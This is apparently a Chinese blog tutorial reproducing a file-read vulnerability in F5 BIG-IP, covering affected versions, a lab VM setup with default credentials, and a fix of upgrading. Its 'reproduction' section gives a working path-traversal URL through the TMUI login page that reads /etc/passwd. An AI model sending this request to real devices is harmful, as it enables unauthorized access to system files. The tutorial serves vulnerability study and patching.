前言
F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。
影响版本
BIG-IP 15.x: 15.1.0/15.0.0
BIG-IP 14.x: 14.1.0 ~ 14.1.2
BIG-IP 13.x: 13.1.0 ~ 13.1.3
BIG-IP 12.x: 12.1.0 ~ 12.1.5
BIG-IP 11.x: 11.6.1 ~ 11.6.5
环境搭建
在下面页面登录注册,之后申请秘钥
https://www.f5.com.cn/trials/big-ip-virtual-edition
https://downloads.f5.com/esd/product.jsp?sw=BIG-IP&pro=big-ip_v11.x&ver=11.6.4
选择存在漏洞的版本
下载完成后在虚拟机-文件-打开
其他全都默认设置
账号,密码
root
扫描二维码关注公众号,回复:
11398101 查看本文章
default
配置ip地址
config
默认即可
访问管理页面
https://192.168.2.112/
账号,密码
admin admin
点击next输入证书激活
这个邮件会发送到注册的邮箱
将生成的license粘贴到下面的网页去激活
将获得的license粘贴回第三部
重新登录
激活成功
漏洞复现
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
修复建议
升级到最新版